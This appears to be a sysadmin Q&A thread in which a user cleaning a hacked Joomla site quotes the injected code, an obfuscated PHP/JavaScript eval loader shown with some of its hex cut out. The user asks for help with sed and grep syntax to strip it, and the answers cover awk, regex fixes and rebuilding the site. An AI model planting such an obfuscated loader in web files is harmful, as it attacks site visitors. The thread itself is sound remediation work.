0

One of our old hosted Joomla sites suffered a JavaScript injection, and im going through cleaning it up. The following code was inserted into every .php or .js file:

<?
#0c0896#
echo " <script type=\"text/javascript\" language=\"javascript\" > bv=(5-3-1);aq=\"0\"+\"x\";sp=\"spli\"+\"t\";ff=String.fromCharCode;w=window;z=\"dy\";try{document[\"\x62o\"+z]++}catch(d21vd12v){vzs=false;v=123;try{document;}catch(wb){vzs=2;}if(!vzs)e=w[\"eval\"];if(1){f=\"17,5d,6c,65,5a,6b,60,66,65,17,71,71,71,5d,5d,5d,1f,20,17,72,4,1,17,6d,58,69,17,71,61,58,67,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,69,5c,58,6b,5c,3c,63,5c,64,5c,65,6b,1f,1e,60,5d1e,6d,60,6a,60,6b,5c,5b,56,6c,68,1e,23,17,1e,2c,2c,1e,23,17,1e,28,1e,23,17,1e,26,1e,20,32,4,1,4,1,71,71,71,5d,5d,5d,1f,20,32,4,1,74,4,1,74,4,1\"[sp](\",\");}w=f;s=[];for(i=2-2;-i+1333!=0;i+=1){j=i;if((0x19==031))if(e)s+=ff(e(aq+(w[j]))+0xa-bv);}za=e;za(s)}</script>";

#/0c0896#
?>

"exact syntax, though the actual code is MUCH longer, I cut a lot of hex from the middle to make it easier"

I am trying to use GREP and SED to do a find and replace on all files, and I don't think I have my syntax for SED quite right.

grep -rl "4b,60,64,5c,1f,6b,66,5b,58,70,25,5e,5c,6b,4b,60,64,5c" ./ | xargs sed -i 's/<?[.*]#0c0896#[.*]#\/0c0896#[.*]?>//g

What I am going for here is to use grep to search all files for a snippet of the code, which is working, and then use SED to replace the tags #0c0896# and everything in between with nothing.

Matt Bear
  • 874
  • 3
  • 12
  • 28
  • Sed is line-based by default. Expressions match a line by line. – Zoredache Jun 11 '13 at 20:17
  • I had same javascript injection - lucky for me my site isn't that important or huge so I manually remove it from time to time. Maybe it would help to `chmod` the files it injects (I `chmod 444` on all php and js files). –  Jul 14 '13 at 11:47

2 Answers2

4

Sed is the wrong tool, because it only considers a line at a time.

Awk is a much better tool for taking action on content between two matching lines.

awk '/a/,/b/ { next } { print }'

will skip everything between lines that match regular expression a and regular expression b.

However, a more direct answer is that once a machine has been compromised, you can't trust anything on it. The only appropriate course of action for a professional sysadmin is to reinstall the machine from scratch.

200_success
  • 4,771
  • 1
  • 25
  • 42
  • this is a hosted GoDaddy site, I dont have any control over the server itself, just my directory. And its a legacy site that I actually didn't even know existed until I was informed by a dev that it was compromised, so there are no backups. If it was one of my servers it would of been rebuilt from a clean backup immediately. (Actually it wouldn't of even been compromised like this to begin with) – Matt Bear Jun 11 '13 at 20:35
  • 1
    found the backups btw... stored on the host, compromised also. I swear, the disaster planning and prevention plan before I got here involved someones grandma and a bible. – Matt Bear Jun 11 '13 at 21:23
  • Then you should probably rebuild the site from scratch. Download Joomla and any add-ons (the same version as whatever was installed on your site) and diff the source code, file by file. As you go along, you'll learn about how the site was put together and all of its problems. – 200_success Jun 11 '13 at 23:53
1

Instead of

<?[.*]#0c0896#[.*]#\/0c0896#[.*]?>

use

<?.*#0c0896#.*#\/0c0896#.*?>

A bracket expression matches only one single character, it that character is in the brackets. Also inside a bracket expression, regex quantifiers and other special characters lose their meaning. The expression you provided means: match an open angle bracket, followed by a question mark, followed by either a dot or a star, followed by ...

Sed is line-oriented, so the .* in the above will not span across lines. Is the offending code on one line?

glenn jackman
  • 4,630
  • 1
  • 17
  • 20